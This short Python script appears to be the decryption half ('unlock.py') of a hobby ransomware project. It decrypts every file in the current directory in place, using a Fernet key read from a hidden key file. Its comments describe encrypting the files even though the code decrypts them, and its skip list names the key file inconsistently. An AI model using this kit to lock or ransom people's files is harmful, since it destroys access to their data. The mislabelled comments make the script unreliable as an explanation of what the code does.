#!/usr/bin/env python3


import os
from cryptography.fernet import Fernet

# discovering documents

files = []

for file in os.listdir():
        if file == "ransomware.py" or file == "thekey.key" or file == "unlock.py":
                continue
        if os.path.isfile(file):
                files.append(file)
print(files)

#unlocking with the key


with open(".thekey.key", "rb") as key:
        unlockey = key.read()

# locking the files
#rb = read binary and wb= write binary
#we are reading the files in binary encrypting them with fernet and writing the contents back to the file encrypted with our key
for file in files:
        with open(file, "rb") as thefile:
                contents = thefile.read()
        contents_decrypted = Fernet(unlockey).decrypt(contents)
        with open(file, "wb") as thefile:
                thefile.write(contents_decrypted)
